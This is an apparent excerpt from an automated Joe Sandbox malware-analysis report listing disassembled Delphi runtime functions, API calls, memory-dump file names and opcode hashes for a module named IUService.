                                                                                                                                            • @System@TObject@ClassName$qqrv.RTL120(00000000,50010608), ref: 500105C6
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,50010608), ref: 500105E8
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,50010608), ref: 500105ED
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$ClassSystem@@$ClassoCreate$qqrp17Except$qqrvException@$bctr$qqrp20MetaName$qqrvObject@RaiseRecpx14RecxiStringSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2276446640-0
                                                                                                                                            • Opcode ID: a47437a02414486e94db703e65b95041672a09583fc297ca935734f4a65545cb
                                                                                                                                            • Instruction ID: 7635616e979078c9aaefdf8b0fdb21b021419f1ddeeb6f58034bbde12a420e8e
                                                                                                                                            • Opcode Fuzzy Hash: a47437a02414486e94db703e65b95041672a09583fc297ca935734f4a65545cb
                                                                                                                                            • Instruction Fuzzy Hash: 6D01F934D04688AFE714CFA4ECA19AEB7B8EB45310F8083A6F854D3380E7315A00CA91
                                                                                                                                            Function 5002D210 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayAddRef$qqrv.RTL120(?,?,00000000), ref: 5002D21E
                                                                                                                                            • @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,00000000,5002D27D,?,?,?,00000000), ref: 5002D241
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002DC60
                                                                                                                                              • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002DC65
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DC88
                                                                                                                                              • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DC8D
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCB0
                                                                                                                                              • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCB5
                                                                                                                                              • Part of subcall function 5002DC38: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002DCBC
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCE1
                                                                                                                                              • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCE6
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@TEncoding@GetCharCount$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,?), ref: 5002DCF3
                                                                                                                                              • Part of subcall function 5002DC38: @System@@DynArraySetLength$qqrv.RTL120(?,?,?,?), ref: 5002DD0D
                                                                                                                                            • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%.RTL120(?,?,00000000,5002D27D,?,?,?,00000000), ref: 5002D24E
                                                                                                                                              • Part of subcall function 5002D730: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                                                              • Part of subcall function 5002D730: @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                                                              • Part of subcall function 5002D730: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                                                              • Part of subcall function 5002D730: @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D284,5002D27D,?,?,?,00000000), ref: 5002D269
                                                                                                                                              • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                                                              • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D284,5002D27D,?,?,?,00000000), ref: 5002D277
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$Sysutils@$ArraySystem@$DynamicSystem@%$Encoding@$Except$qqrvException@$bctr$qqrp20Length$qqrvRaiseString$Recpx14Recxi$Array$tb%Array$tuc%iiBytes$qqrx24Clear$qqrrpvpv$Array$qqrpvt1uiArray$tb%iir25Array$tuc%iByteCharChars$qqrx25Count$qqrx24Count$qqrx25FinalizeFreeMem$qqrpvRef$qqrv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 306697395-0
                                                                                                                                            • Opcode ID: 70b8e1b795e1d37dd9de12cc76fc3247445453c6de169292efa2efb0df9a22ae
                                                                                                                                            • Instruction ID: 5ec251f640e733fb77e8b4a269d7085e3b95d1142e22d4d9b3bdac147b7f947c
                                                                                                                                            • Opcode Fuzzy Hash: 70b8e1b795e1d37dd9de12cc76fc3247445453c6de169292efa2efb0df9a22ae
                                                                                                                                            • Instruction Fuzzy Hash: DB01AF74205649EFEB04CF94FC91C8E73E9EB5C710BA18266FD0493750D630EE06CAA0
                                                                                                                                            Function 5000E884 Relevance: 7.5, APIs: 5, Instructions: 39libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                                                            • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(00000000,5000E8E7,?,?,?,00000000), ref: 5000E8BB
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000E8E7,?,?,?,00000000), ref: 5000E8C3
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 5000E8CA
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AddressAnsiProcStringSystem@%$Char$qqrr27Char$qqrx27Clr$qqrpvFromT$us$i0$%T$us$i0$%pbus
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 107858258-0
                                                                                                                                            • Opcode ID: 3cf80b2481eac8ac2a36653dc93b19aa85d9f1d37a2655b46f373c6b8d52bf22
                                                                                                                                            • Instruction ID: e43e5a50d2d678b4319a06595b8d852140739d2f680c724791b48c723902c0e4
                                                                                                                                            • Opcode Fuzzy Hash: 3cf80b2481eac8ac2a36653dc93b19aa85d9f1d37a2655b46f373c6b8d52bf22
                                                                                                                                            • Instruction Fuzzy Hash: 88F062306091C86FF701DE94DC61A5D73DCEB4D250FD18172F944A7241DA30AE0097A4
                                                                                                                                            Function 500361D8 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 500361E8
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,50036242,?,?,50031CC6,?), ref: 50036200
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,50031CC6,?), ref: 5003621D
                                                                                                                                              • Part of subcall function 50030760: @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003078A
                                                                                                                                              • Part of subcall function 50030760: @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003079E
                                                                                                                                              • Part of subcall function 50030760: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,500307EF), ref: 500307BB
                                                                                                                                              • Part of subcall function 50030760: @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,500307EF), ref: 500307CA
                                                                                                                                              • Part of subcall function 50030760: @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500307EF), ref: 500307CF
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,50031CC6,?), ref: 50036227
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50036249,?), ref: 5003623C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Variants@$DataDelphiInterface$t17System@%System@@Text$qqrxusTypeVariants@@$CastClear$qqrr8Copy$qqrr45Copy$qqrr8Datarx8Error$qqrxusxusExcept$qqrvException@$bctr$qqrx20InitInterface%Interface%x45IntfLoadRaiseRecxiStringString$qqrp20Stringpx14Sysutils@UnicodeVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 988964766-0
                                                                                                                                            • Opcode ID: 3e51a930155f52609a69f7ecc2d799318dbfb32c9426716d5385200eebb1c117
                                                                                                                                            • Instruction ID: 82e32fdd6d9bf0081f9b9c5e345962e68cc75b98aa7a34b5522ba3782ff368db
                                                                                                                                            • Opcode Fuzzy Hash: 3e51a930155f52609a69f7ecc2d799318dbfb32c9426716d5385200eebb1c117
                                                                                                                                            • Instruction Fuzzy Hash: 39F0CD30A156994FCB02DBA5EC518EFB3ACFF48300F814A32E410D3250EB75AC048AE4
                                                                                                                                            Function 5002C0CC Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C0D9
                                                                                                                                            • @System@TObject@$bctr$qqrv.RTL120 ref: 5002C0E8
                                                                                                                                            • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120 ref: 5002C0F9
                                                                                                                                            • @Sysutils@TStringBuilder@Append$qqrx20System@UnicodeString.RTL120 ref: 5002C107
                                                                                                                                            • @System@@AfterConstruction$qqrp14System@TObject.RTL120 ref: 5002C112
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$System@@Sysutils@$AfterAppend$qqrx20Builder@Builder@set_Capacity$qqriClassClassoConstruction$qqrp14Create$qqrp17MetaObjectObject@$bctr$qqrvUnicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2859721611-0
                                                                                                                                            • Opcode ID: 21f0d74a83fb4ff8832bd7025fe4923f79583aba0890a39072b30d0fc51a864e
                                                                                                                                            • Instruction ID: 39a3893f9b0b29f08e61ee327ab757ae22a9345e4dc45241c438b3d4ad3786ae
                                                                                                                                            • Opcode Fuzzy Hash: 21f0d74a83fb4ff8832bd7025fe4923f79583aba0890a39072b30d0fc51a864e
                                                                                                                                            • Instruction Fuzzy Hash: 9CF0A773B02581579300D6AEBC81A6AB68B9BD5670B188332F52CC7386DB268C1246E5
                                                                                                                                            Function 500243A4 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$StringSystem@System@@$EnsureString$qqrr20$AnsiFromInternalLen$qqrx20Str$qqrr20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3020172278-0
                                                                                                                                            • Opcode ID: 6cdf5f7169a857eab86092ba583cd5dfa0d9c452280a2cdb4edc37c4faf4d93b
                                                                                                                                            • Instruction ID: 8a90345f6e56a0fa8899a303c97709957ae8c098f7633a4adecdb0ccf3c4c27c
                                                                                                                                            • Opcode Fuzzy Hash: 6cdf5f7169a857eab86092ba583cd5dfa0d9c452280a2cdb4edc37c4faf4d93b
                                                                                                                                            • Instruction Fuzzy Hash: 5DF0F031406289EFE755EFA4E8929ACB3F8EF183007A146B7E80093121E7702F00D692
                                                                                                                                            Function 5002D19C Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayAddRef$qqrv.RTL120(?,?,00000000), ref: 5002D1AA
                                                                                                                                            • @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%.RTL120(00000000,5002D201,?,?,?,00000000), ref: 5002D1C5
                                                                                                                                              • Part of subcall function 5002DC14: @System@@DynArrayLength$qqrv.RTL120(?,?,?,5002D1CA,00000000,5002D201,?,?,?,00000000), ref: 5002DC1F
                                                                                                                                              • Part of subcall function 5002DC14: @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,00000000,?,?,?,5002D1CA,00000000,5002D201,?,?,?,00000000), ref: 5002DC2C
                                                                                                                                            • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%.RTL120(00000000,5002D201,?,?,?,00000000), ref: 5002D1D2
                                                                                                                                              • Part of subcall function 5002D730: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                                                              • Part of subcall function 5002D730: @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                                                              • Part of subcall function 5002D730: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                                                              • Part of subcall function 5002D730: @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D208,?,?,00000000), ref: 5002D1ED
                                                                                                                                              • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                                                              • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D208,?,?,00000000), ref: 5002D1FB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$ArrayDynamicSystem@%$Encoding@Sysutils@$Length$qqrv$Array$tb%Bytes$qqrx24Chars$qqrx25Clear$qqrrpvpv$Array$qqrpvt1uiArray$tb%iir25Array$tuc%Array$tuc%iArray$tuc%iiByteCount$qqrx24FinalizeFreeMem$qqrpvRef$qqrv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 124126621-0
                                                                                                                                            • Opcode ID: 9a55dd426d69212cea5294c82b78c0f17d40f7f65fb3b2c228ee3267651922e4
                                                                                                                                            • Instruction ID: ea8ea964c1ccbf4185af528d9a84d920c2f529ad8815d3faa1f173e3987db8ef
                                                                                                                                            • Opcode Fuzzy Hash: 9a55dd426d69212cea5294c82b78c0f17d40f7f65fb3b2c228ee3267651922e4
                                                                                                                                            • Instruction Fuzzy Hash: DBF0C234205548EFDB04DF90FC91D4973A9EB58310BA18277FC0883711D630EE02C590
                                                                                                                                            Function 5001B8F0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InitializeRecord$qqrpvt1.RTL120 ref: 5001B905
                                                                                                                                              • Part of subcall function 5000AE00: @System@@InitializeArray$qqrpvt1ui.RTL120 ref: 5000AE24
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B958), ref: 5001B920
                                                                                                                                            • @System@EnumResourceModules$qqrpqqripv$opv.RTL120(00000000,5001B958), ref: 5001B92D
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B958), ref: 5001B937
                                                                                                                                            • @System@@FinalizeRecord$qqrpvt1.RTL120(5001B95F), ref: 5001B952
                                                                                                                                              • Part of subcall function 5000AED8: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,?,?,50006C67,?,?,50006BAA), ref: 5000AEFC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$Unicode$Array$qqrpvt1uiAsg$qqrr20FinalizeInitializeRecord$qqrpvt1StringStringx20$EnumModules$qqrpqqripv$opvResource
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2269274692-0
                                                                                                                                            • Opcode ID: c6deeecd6d38e02dca0c240106d8acc9fad9f78a616a536245d8c20f9f784f3c
                                                                                                                                            • Instruction ID: ba510fcea000b4b5886386029a871e670e821f6a008f22ad42f0b1393bee6191
                                                                                                                                            • Opcode Fuzzy Hash: c6deeecd6d38e02dca0c240106d8acc9fad9f78a616a536245d8c20f9f784f3c
                                                                                                                                            • Instruction Fuzzy Hash: 59F096315012889FEB11EBA8DD9289E77EDDBD9610B958773E50093611EB305E45C6D0
                                                                                                                                            Function 50003980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 50003991
                                                                                                                                            • VirtualQuery.KERNEL32(00000000,?,0000001C), ref: 50003A25
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
